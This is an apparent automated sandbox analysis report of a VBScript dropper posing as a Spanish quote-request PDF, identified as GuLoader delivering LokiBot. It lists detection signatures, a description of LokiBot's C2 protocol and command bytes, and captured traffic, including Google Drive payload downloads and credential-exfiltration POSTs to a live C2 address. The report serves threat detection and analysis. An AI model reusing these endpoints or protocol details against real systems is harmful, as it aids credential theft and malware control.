Windows Analysis Report
Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs

Overview

General Information

Sample name: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: Solicitud de presupuesto 09-30-2024pdf.vbs
Analysis ID: 1523153
MD5: 5cc7cf5b0814e2f80bad4c4e85831e96
SHA1: 93ed4011fc57034804feb5bd8ea61c6cf7b30cce
SHA256: 12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394
Tags: vbsuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection

barindex
Source: http://137.184.191.215/index.php/10899 Virustotal: Detection: 10% Perma Link
Source: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs Virustotal: Detection: 9% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: Binary string: qm.Core.pdb?8 source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49709 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49709 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49715 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49715 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49709 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49711 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49711 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49711 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49711 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49710 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49710 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49710 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49720 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49720 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49722 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49722 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49722 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49722 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49720 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49715 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49720 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49715 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49730 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49730 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49730 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49730 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49725 -> 137.184.191.215:80
Source: Joe Sandbox View IP Address: 137.184.191.215 137.184.191.215
Source: Joe Sandbox View ASN Name: PANDGUS PANDGUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49707 -> 142.250.185.142:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 192Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 192Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
